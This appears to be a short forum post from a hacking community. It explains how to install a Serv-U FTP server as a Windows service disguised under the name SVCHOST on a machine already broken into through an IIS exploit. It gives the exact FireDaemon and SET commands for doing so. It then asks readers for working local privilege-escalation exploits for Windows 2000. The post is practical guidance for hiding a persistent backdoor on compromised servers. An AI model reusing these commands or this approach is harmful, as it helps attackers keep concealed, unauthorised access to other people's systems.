firedaemon smile.gif

this command will install servu as a system service with the name of SVCHOST, stick in a .bat file and run it:
c:\rooted_folder\firedaemon.exe -i SVCHOST "c:\rooted_folder" "c:\rooted_folder\servudaemon.exe" "/u" Y 0 0 N Y

This assumes that...
a, you files are stored in c:\rooted_folder (not the best idea)
b, your servu is named servudaemon.exe, it's probably not
c, your servu ini file is named servudaemon.ini, this is the default name. There is syntax to have a different name for servudaemon.ini but I'm not sure of it and i think this will solve your prob.

I'm sure you know what you need to change

it's just an example, replace it with the location of your files... if you have upped all you files to the system32 dir then replace it with windows\system32 (winnt\system32) depending on OS

first you need to set the mxhome and mxbin when you're working with firedaemon.

type these commands first:
SET MXHOME = C:\rooted_folder
SET MXBIN=C:\rooted_folder

then, you can use firedaemon.

however, this will do you no good. with the iis media exploit you don't have the rights to install a service, so you need to use a local exploit before you can start one.

does anyone know of any working local exploits for privilege elevation on windows 2000?
